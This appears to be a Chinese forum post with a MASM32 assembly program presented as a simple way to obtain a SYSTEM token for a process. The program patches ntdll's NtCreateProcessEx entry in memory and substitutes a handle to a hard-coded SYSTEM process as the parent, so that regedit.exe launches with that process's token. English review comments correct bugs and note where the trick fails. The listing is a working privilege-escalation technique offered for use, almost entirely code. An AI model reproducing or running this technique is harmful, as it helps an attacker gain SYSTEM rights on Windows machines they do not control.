[原创]一个为Process取得SYSTEM令牌的简单方法
一个为Process取得SYSTEM令牌的简单方法
2. 为进程取得 SE_DEBUG_NAME（SeDebugPrivilege）权限，如果不这样做就会有一个（原文此处截断）。注意：下面的代码只定义了 'SeDebugPrivilege' 字符串，并没有调用 AdjustTokenPrivileges 真正启用它，OpenProcess 能否成功完全取决于运行者自身的权限。
;*********************************************
;** code by hopy | 侯佩 **
;*********************************************
.386
.model flat,stdcall
option casemap:none
include /masm32/include/windows.inc
include /masm32/include/kernel32.inc
include /masm32/include/user32.inc
include /masm32/include/advapi32.inc
includelib /masm32/lib/kernel32.lib
includelib /masm32/lib/user32.lib
includelib /masm32/lib/advapi32.lib
.const
; Image launched through the hooked CreateProcess path.
szexe db 'regedit.exe',0
; Module / export that the detour is installed on.
szdll db 'ntdll.dll',0
szfuc db 'NtCreateProcessEx',0
; PID whose handle is substituted as the ParentProcess argument. Hard-coded;
; it has to be changed to a process running under the token you want
; (a SYSTEM process, per the page title) on the machine this is run on.
pid dd 540
; Privilege name. NOTE(review): declared but never passed to
; LookupPrivilegeValue/AdjustTokenPrivileges anywhere in this listing,
; so the privilege is never actually enabled.
SE_DEBUG_NAME0 db 'SeDebugPrivilege',0
; Nine stdcall dword arguments; hookcode only cares that the 4th one is
; the parent-process handle (per the native prototype -- confirm against
; the target OS build).
_NtCreateProcessEx typedef proto :dword,:dword,:dword,/
:dword,:dword,:dword,/
:dword,:dword,:dword
lpNtCreateProcessEx typedef ptr _NtCreateProcessEx
.data?
; Handle to `pid`, opened in init; written into the hooked call by hookcode.
ph HANDLE ?
; Address of ntdll!NtCreateProcessEx, resolved in init.
NtCreateProcessEx lpNtCreateProcessEx ?
; Passed to CreateProcess; left all-zero here (including .cb).
suinfo STARTUPINFO <?>
proc_info PROCESS_INFORMATION <?>
; Page protection recorded by VirtualProtect before/after the patch.
oldprotect dword ?
; Memory operand of the patched `jmp dword ptr [lphookcode]`. The jmp reads
; the detour address from here at run time, so it must contain the address
; of hookcode before the patched entry is ever executed (.data? is zero at load).
lphookcode dword ?
; Original first 6 bytes of NtCreateProcessEx, restored by hookcode.
oldcode db 6 dup(?)
.code
;***************************************************************
start:
; Entry point: skip over the detour body, which is only ever reached
; through the jmp patched into NtCreateProcessEx.
jmp init
hookcode:
; Detour for NtCreateProcessEx. Control arrives via the 6-byte jmp written
; over the function's entry, so [esp] is still the caller's return address
; and the stdcall arguments sit directly above it.
pushad
mov eax,ph
; After pushad (8 regs = 20h bytes): [esp+20h] = return address,
; [esp+24h] = arg1, ... [esp+30h] = arg4 = ParentProcess. Overwrite it with
; the handle opened in init so the new process is created as a child of
; that process (which is how it ends up with that process's token).
mov [esp+30h],eax
; One-shot hook: put the saved original bytes back ...
invoke RtlMoveMemory,NtCreateProcessEx,/
addr oldcode,6
; ... and restore the page protection recorded when the patch was applied.
mov eax,oldprotect
invoke VirtualProtect,NtCreateProcessEx,16,/
eax,addr oldprotect
popad
; Tail-jump into the now-restored original. It returns straight to the
; caller with the spoofed ParentProcess already in place on the stack.
mov eax,NtCreateProcessEx
jmp eax
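init:
    ; Resolve the native entry that kernel32's CreateProcess funnels into.
    ; NOTE(review): on Windows builds where CreateProcess goes through
    ; NtCreateUserProcess instead, this hook is never reached -- confirm
    ; the target OS before relying on it.
    invoke LoadLibrary,addr szdll
    test eax,eax
    jz fail
    invoke GetProcAddress,eax,addr szfuc
    test eax,eax
    jz fail                             ; export missing: nothing to hook
    mov NtCreateProcessEx,eax
    ; Open the parent-to-be BEFORE touching ntdll, so a failure here leaves
    ; nothing patched. PROCESS_CREATE_PROCESS is the right that
    ; NtCreateProcessEx checks on ParentProcess; asking for PROCESS_ALL_ACCESS
    ; only widens the chance the target's DACL refuses us.
    ; NOTE(review): SE_DEBUG_NAME0 is declared but never enabled, so this
    ; relies solely on the caller's own rights to open a SYSTEM-owned PID.
    invoke OpenProcess,PROCESS_CREATE_PROCESS,FALSE,pid
    test eax,eax
    jz fail
    mov ph,eax
    ; The patched entry is `jmp dword ptr [lphookcode]`: it reads the detour
    ; address from this variable at run time, so it must be filled in before
    ; the first byte of NtCreateProcessEx is overwritten. The original
    ; listing never assigned it, sending the hooked call to address 0.
    mov lphookcode,offset hookcode
    ; Keep the original 6 bytes; hookcode puts them back on its first hit.
    invoke RtlMoveMemory,addr oldcode,NtCreateProcessEx,6
    ; The page must stay executable: PAGE_READWRITE (as originally written)
    ; makes the patched entry fault under DEP the moment it is called.
    invoke VirtualProtect,NtCreateProcessEx,16,PAGE_EXECUTE_READWRITE,addr oldprotect
    test eax,eax
    jz fail
    mov edi,NtCreateProcessEx
    mov word ptr ds:[edi],025ffh        ; FF 25 disp32 = jmp dword ptr [disp32]
    mov dword ptr ds:[edi+2],offset lphookcode
    ; STARTUPINFO.cb must be the structure size; .data? leaves it zero.
    mov suinfo.cb,sizeof STARTUPINFO
    ; CreateProcess reaches the patched NtCreateProcessEx, where hookcode
    ; swaps ph in as ParentProcess and then removes the hook.
    invoke CreateProcess,NULL,addr szexe,NULL,NULL,FALSE,NORMAL_PRIORITY_CLASS,NULL,NULL,addr suinfo,addr proc_info
    invoke ExitProcess,NULL
fail:
    ; Any setup failure: nothing has been patched that is still live, so
    ; just leave with a non-zero exit code.
    invoke ExitProcess,1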
;***************************************************************
end start